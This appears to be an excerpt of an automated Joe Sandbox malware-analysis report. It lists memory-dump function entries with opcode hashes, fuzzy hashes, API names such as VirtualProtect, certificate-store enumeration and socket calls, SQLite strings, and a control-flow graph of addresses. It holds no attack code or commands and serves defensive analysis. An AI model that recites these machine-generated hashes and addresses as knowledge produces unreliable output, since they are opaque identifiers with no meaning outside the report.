                                                                                                                                                                                                                                                              • Opcode ID: 5127ec984dcdca13ee2ae5df52fccc4828cd11522177691d3ca0826426f12d1e
                                                                                                                                                                                                                                                              • Instruction ID: 2372bb6755848d43a13fe5aa2de846d273a179b1a52b5056316a6f0daf35ee50
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5127ec984dcdca13ee2ae5df52fccc4828cd11522177691d3ca0826426f12d1e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF927C31A0EEC2A2FB609F21D8447B967B1EF85BC4F646035DA4DC66A9EF3DE4418710
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484350469.00007FF8A8F29000.00000080.00000001.01000000.00000004.sdmp, Offset: 00007FF8A8950000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483309052.00007FF8A8950000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483357030.00007FF8A8951000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483357030.00007FF8A8BEA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483357030.00007FF8A8CA6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483357030.00007FF8A8CCB000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483357030.00007FF8A8D65000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483357030.00007FF8A8D68000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483357030.00007FF8A8E70000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483357030.00007FF8A8EB1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483357030.00007FF8A8EBB000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483357030.00007FF8A8F1D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484391036.00007FF8A8F2B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a8950000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                              • String ID: 2v]
                                                                                                                                                                                                                                                              • API String ID: 3300690313-3021020117
                                                                                                                                                                                                                                                              • Opcode ID: 9bddde282dbbdb65e7b91acdafd26197c66bfe7ae65582efb0e6c09338b35502
                                                                                                                                                                                                                                                              • Instruction ID: 2ca1ca1a4e0a0596bc6fcbe149f7e3b62edfded968e6f26d01e95649c6b0a685
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bddde282dbbdb65e7b91acdafd26197c66bfe7ae65582efb0e6c09338b35502
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3362133262919296E7198F38E5002BD77A0FB487C5F149532EA9EC3784FB3CEA45CB14
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485371418.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B7E10000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485330634.00007FF8B7E10000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485371418.00007FF8B7E30000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485371418.00007FF8B7E39000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485371418.00007FF8B7E3D000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485534943.00007FF8B7E40000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485575820.00007FF8B7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e10000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Cert$Store$ErrorLast$00007CertificateCertificatesCloseContextEnhancedEnumFreeOpenUsage
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1905439668-0
                                                                                                                                                                                                                                                              • Opcode ID: 026a14245fef453ce3d65f29d84bb8553a0a4b30dbea44e5e557f8660a976952
                                                                                                                                                                                                                                                              • Instruction ID: a1f05d7d8b9e65cade3cab5324005c78ecb5ebeedac348cb7c36361b806e5436
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 026a14245fef453ce3d65f29d84bb8553a0a4b30dbea44e5e557f8660a976952
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C961F961E0DB1281FAD9DFB9995613E63A1AF55FE0F094474CB0E16FA0EE3EA845D300
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                                              • API String ID: 3568877910-4201244970
                                                                                                                                                                                                                                                              • Opcode ID: db567f1d966d48c1a6eb9b22193708d6558ba034de356d8c5b90380909e4eb80
                                                                                                                                                                                                                                                              • Instruction ID: f6c2bf71466809509cdeb863bad096df11169b71072418f851744cacf74d1921
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db567f1d966d48c1a6eb9b22193708d6558ba034de356d8c5b90380909e4eb80
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5432BD22A0A782A6EB648F25944437977A1FF45BE8F484235CE5E477D4EF3CE464C328
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                                                              • API String ID: 3568877910-1046679716
                                                                                                                                                                                                                                                              • Opcode ID: 0d300a8cd5454f87c66fd638e27987bfbefb878a4d46b03e8c9914967d7855c6
                                                                                                                                                                                                                                                              • Instruction ID: c813cdbc3d62d56f0809b8d9cf917e055398013256b7e6c1cb504e71c74bc002
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d300a8cd5454f87c66fd638e27987bfbefb878a4d46b03e8c9914967d7855c6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CCF1C726B0E782A6FB29CF2194503BA67A0FB85BC8F441175DA8E07795DF7CE840C718
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3300690313-0
                                                                                                                                                                                                                                                              • Opcode ID: 967db69ea97db98777b7c1819c1f1553088aaf51e529f8141078863ed4501264
                                                                                                                                                                                                                                                              • Instruction ID: 39c92f27295754e5a5cc0a63f2ecee9ad8b06db5af43f7cef91f166f2636f7c3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 967db69ea97db98777b7c1819c1f1553088aaf51e529f8141078863ed4501264
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4762276262829286E7158E3CD4002BD7791FB58BC6F045532EB9ED77D8EA3CFA45C700
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485250154.00007FF8B7E02000.00000080.00000001.01000000.00000011.sdmp, Offset: 00007FF8B7DF0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485076175.00007FF8B7DF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485119166.00007FF8B7DF1000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485119166.00007FF8B7DFE000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485119166.00007FF8B7E01000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485286720.00007FF8B7E03000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7df0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3300690313-0
                                                                                                                                                                                                                                                              • Opcode ID: 0830e18f13b383c0d94ef01180bde7bd9eef2b0f7716c651d804f7d705106dd4
                                                                                                                                                                                                                                                              • Instruction ID: 93846c151dad19a57e1f4650704f193d2dced857be197b70b9deebb8aec23bc2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0830e18f13b383c0d94ef01180bde7bd9eef2b0f7716c651d804f7d705106dd4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7062162262869286E7168E3CD4452BD77D4FB58BC5F045532EB9EC37A4EA3CEA45CB00
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482755530.00007FF8A8797000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FF8A82A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481123085.00007FF8A82A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481190225.00007FF8A82A1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481190225.00007FF8A82B2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481190225.00007FF8A82C2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481190225.00007FF8A82C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481190225.00007FF8A8312000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481190225.00007FF8A8327000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481190225.00007FF8A8337000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481190225.00007FF8A833E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481190225.00007FF8A834C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481190225.00007FF8A8609000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481190225.00007FF8A860B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481190225.00007FF8A8642000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481190225.00007FF8A8682000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481190225.00007FF8A86DA000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481190225.00007FF8A874A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481190225.00007FF8A877F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2481190225.00007FF8A8791000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482832538.00007FF8A8799000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a82a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3300690313-0
                                                                                                                                                                                                                                                              • Opcode ID: fd6e17aede7dd1a07b4ecde7e4701136c40a3ad312db3d6b815d4e7960ab785a
                                                                                                                                                                                                                                                              • Instruction ID: f8f8bb7b0663e77afb1b4d0256db863b1239f3290594641628df01dca47f7013
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd6e17aede7dd1a07b4ecde7e4701136c40a3ad312db3d6b815d4e7960ab785a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC62332262999296E799CF38D40027D77A0FB487C5F045532EAAEC37C4EB3CEA54CB14
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: bind
                                                                                                                                                                                                                                                              • String ID: bind$socket.bind
                                                                                                                                                                                                                                                              • API String ID: 1187836755-187351271
                                                                                                                                                                                                                                                              • Opcode ID: dc24cef773245b4122254bbfd203ff68aadfac931a17838e96712d49baaaed77
                                                                                                                                                                                                                                                              • Instruction ID: 8f29e6f144932146a8a6baaa7c88cd598d0e4e2cc50b6e8a100bdf4fd7aca624
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc24cef773245b4122254bbfd203ff68aadfac931a17838e96712d49baaaed77
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B011E2A5A08BCA82E7209B59E8417AE6364FF89FC4F040532DB8D57A64DF7CF549C710
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007C6125630
                                                                                                                                                                                                                                                              • String ID: :memory:
                                                                                                                                                                                                                                                              • API String ID: 1529501491-2920599690
                                                                                                                                                                                                                                                              • Opcode ID: 850099d980877facda77a0513fb5da35c40c272eade80bd78b5070cbea877dfb
                                                                                                                                                                                                                                                              • Instruction ID: c8e7ef1b82ee1f5f6f0db32d4b796acc115b1cf8b4e07497ef4f491957e51323
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 850099d980877facda77a0513fb5da35c40c272eade80bd78b5070cbea877dfb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E42E022E4E78AA2EB658F26945437967A0FF45BC5F084135DA4D43790EFBCEC90C728
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InfoSystem
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 31276548-0
                                                                                                                                                                                                                                                              • Opcode ID: b0054afb10e4f66619171edf603becae74e7afe6d3d72f3cb96377bce576b712
                                                                                                                                                                                                                                                              • Instruction ID: dd62f9c4025aaa57ffbdadb66c2c4c0f622a6d7c27d0812be3e20ae033f2e746
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0054afb10e4f66619171edf603becae74e7afe6d3d72f3cb96377bce576b712
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08A1F664E4BB07A6FF688B55A85833862E4FF55BC5F580539C90E077A0FF7CA4918328
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: recv
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1507349165-0
                                                                                                                                                                                                                                                              • Opcode ID: 05f4ad654d63955a228a8d88d4a6ecf7af8c89285e2e0ece8e9722be10d1f702
                                                                                                                                                                                                                                                              • Instruction ID: bf67adbe8486f601b2f91f72ff457bdd55486f271dbcb59e47d7e0e8af656f43
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05f4ad654d63955a228a8d88d4a6ecf7af8c89285e2e0ece8e9722be10d1f702
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90E012B1B0074582DB189B1AD4512386391FB08FA4F245735DE3D8B3E0DE2CD8E1C340

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 579 7ff8b8af5f30-7ff8b8af5f4d 580 7ff8b8af5f5e-7ff8b8af5f62 579->580 581 7ff8b8af5f4f-7ff8b8af5f58 call 7ff8b8afe1b8 579->581 583 7ff8b8afce25-7ff8b8afce46 call 7ff8b8afe1c0 call 7ff8b8afe210 580->583 584 7ff8b8af5f68-7ff8b8af5f6d 580->584 581->580 592 7ff8b8afcdfe-7ff8b8afce20 call 7ff8b8afe1b8 call 7ff8b8afe4b8 581->592 587 7ff8b8af5f73-7ff8b8af5f76 584->587 588 7ff8b8af6321-7ff8b8af6336 call 7ff8b8afe4d8 584->588 589 7ff8b8af6261-7ff8b8af6273 call 7ff8b8afe490 587->589 590 7ff8b8af5f7c-7ff8b8af5f93 call 7ff8b8afe120 587->590 588->592 589->590 606 7ff8b8af6279 589->606 603 7ff8b8af6179-7ff8b8af617b 590->603 604 7ff8b8af5f99-7ff8b8af5fb3 call 7ff8b8afe470 590->604 592->603 609 7ff8b8af611b-7ff8b8af612b 603->609 604->603 611 7ff8b8af5fb9-7ff8b8af5fde call 7ff8b8afe708 604->611 606->603 614 7ff8b8af62c4-7ff8b8af62d8 call 7ff8b8afe4d8 611->614 615 7ff8b8af5fe4-7ff8b8af5feb 611->615 614->603 615->615 617 7ff8b8af5fed-7ff8b8af5ff0 615->617 619 7ff8b8af5ff6-7ff8b8af601f call 7ff8b8afe468 call 7ff8b8afe758 617->619 620 7ff8b8af6248-7ff8b8af625c call 7ff8b8afe4d8 617->620 626 7ff8b8af6025-7ff8b8af6032 call 7ff8b8afe238 619->626 620->603 629 7ff8b8af616e-7ff8b8af6174 call 7ff8b8af5c20 626->629 630 7ff8b8af6038-7ff8b8af6049 626->630 629->603 631 7ff8b8af6180-7ff8b8af6186 630->631 632 7ff8b8af604f-7ff8b8af6056 630->632 636 7ff8b8af6198-7ff8b8af619e 631->636 637 7ff8b8af6188-7ff8b8af6191 631->637 634 7ff8b8af60e0-7ff8b8af60f3 call 7ff8b8afe218 632->634 635 7ff8b8af605c-7ff8b8af6062 632->635 650 7ff8b8af61fe-7ff8b8af620e call 7ff8b8afe7b0 634->650 651 7ff8b8af60f9-7ff8b8af6118 call 7ff8b8afe1a0 634->651 638 7ff8b8af612c-7ff8b8af6132 635->638 639 7ff8b8af6068-7ff8b8af6080 00007FF8C6126A30 635->639 642 7ff8b8af61a0-7ff8b8af61b4 636->642 643 7ff8b8af61ea-7ff8b8af61f8 call 7ff8b8afe4d8 636->643 637->631 640 7ff8b8af6193 637->640 638->639 644 7ff8b8af6138-7ff8b8af614b 638->644 645 7ff8b8af6086-7ff8b8af609e 00007FF8C6126A30 639->645 646 7ff8b8af6164-7ff8b8af6169 639->646 642->643 643->650 644->646 645->646 649 7ff8b8af60a4-7ff8b8af60bc 00007FF8C6126A30 645->649 646->634 649->646 653 7ff8b8af60c2-7ff8b8af60da 00007FF8C6126A30 649->653 650->609 651->609 653->634 653->646
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8AF0000, based on PE: true
